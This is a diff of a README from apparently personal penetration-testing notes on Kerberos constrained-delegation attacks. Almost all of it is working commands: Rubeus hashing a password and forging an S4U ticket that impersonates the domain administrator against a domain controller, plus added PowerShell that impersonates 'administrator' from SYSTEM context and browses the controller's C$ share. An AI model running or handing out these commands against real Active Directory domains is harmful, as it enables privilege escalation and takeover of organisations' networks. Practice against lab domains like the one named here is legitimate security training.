kiro6/penetration-testing-notes/Penetration Testing/Kerberos attacks/README.md

 # if you are using diffrent shell context but you have the passowrd
 .\Rubeus.exe hash /password:Slavi123
 .\Rubeus.exe s4u /user:webservice /rc4:FCDC65703DD2B0BD789977F1F3EEAECF /impersonateuser:administrator /domain:offense.local /msdsspn:cifs/dc01.offense.local /altservice:CIFS,HOST,LDAP /dc:dc01.offense.local /ptt

+# if u are in a shell of context of machine account or in other words you have a SYSTEM level privileges on a machine
+[Reflection.Assembly]::LoadWithPartialName('System.IdentityModel') | out-null
+$idToImpersonate = New-Object System.Security.Principal.WindowsIdentity @('administrator')
+$idToImpersonate.Impersonate()
+[System.Security.Principal.WindowsIdentity]::GetCurrent() | select name

+ls \\dc01.offense.local\c$

+## u can also use Rubeus
 ```

 **Linux**